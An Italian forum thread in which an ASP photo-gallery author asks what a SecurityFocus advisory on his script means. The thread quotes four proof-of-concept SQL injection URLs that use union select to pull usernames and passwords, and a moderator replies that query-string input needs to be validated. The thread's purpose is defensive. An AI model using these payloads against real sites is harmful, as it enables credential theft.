Visualizzazione dei risultati da 1 a 7 su 7

Discussione: Sicurezza script ASP

  1. #1
    Utente di HTML.it L'avatar di TeoB
    Registrato dal
    Dec 2004
    Messaggi
    592

    Sicurezza script ASP

    Salve a tutti, sono capitato su questa pagina che parla dello mio script asp per le gallerie fotografiche.

    http://www.securityfocus.com/bid/27262/info

    A quanto pare non è giudicato molto sicuro, ma non riesco a capire in che senso...cliccando su exploit dice:

    An attacker can exploit these issues via a browser.

    The following proof-of-concept URIs are available:

    http://www.example.com/Imgbig.asp?Id='union select user as name,1,pass as descrizione from stuff where '1'='1

    http://www.example.com/thumbricerca.asp?id=-1'union select user as name,1,pass as descrizione from stuff where 1 like

    http://www.example.com/thumbricerca.asp?ricerca=-1'union select user as name,1,pass as descrizione from stuff where 1 lik

    http://www.example.com/thumb.asp?id=' union select user as name,1,pass as descrizione from stuff where '1'='1
    Qualcuno potrebbe spiegarmi cosa vuol dire?

  2. #2
    Moderatore di ASP e MS Server L'avatar di Roby_72
    Registrato dal
    Aug 2001
    Messaggi
    19,559
    Vuol dire che passando altri parametri oltre o escludendo l'id in modo fraudolento si potrebbe riuscire a carpire user e password di eventuali aree riservate presenti.
    Non ho provato.

    Roby

  3. #3
    Utente di HTML.it L'avatar di TeoB
    Registrato dal
    Dec 2004
    Messaggi
    592
    'stica Speriamo non ci provi nessuno.

    Ma è un problema risolvibile?

    edit: ho fatto una prova, sul mio sito non puó funzionare perchè ho uno script leggermente diverso, peró su tutti gli altri siti funziona eccome...

    Come posso risolvere? Il tutto sta nel passare la pass in un altro modo, vero?

  4. #4
    Moderatore di ASP e MS Server L'avatar di Roby_72
    Registrato dal
    Aug 2001
    Messaggi
    19,559
    Il tutto sta nel controllare che ciò che viene passato per querystring sia sensato!

    Roby

  5. #5

  6. #6
    Moderatore di ASP e MS Server L'avatar di Roby_72
    Registrato dal
    Aug 2001
    Messaggi
    19,559
    Originariamente inviato da optime
    prova a leggere qui http://www.15seconds.com/issue/020701.htm
    Lo stavo appunto cercando all'interno del mio marasma ma non lo trovavo...

    Roby

  7. #7
    Utente di HTML.it L'avatar di TeoB
    Registrato dal
    Dec 2004
    Messaggi
    592
    Grazie mille, dopo lo guardo

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.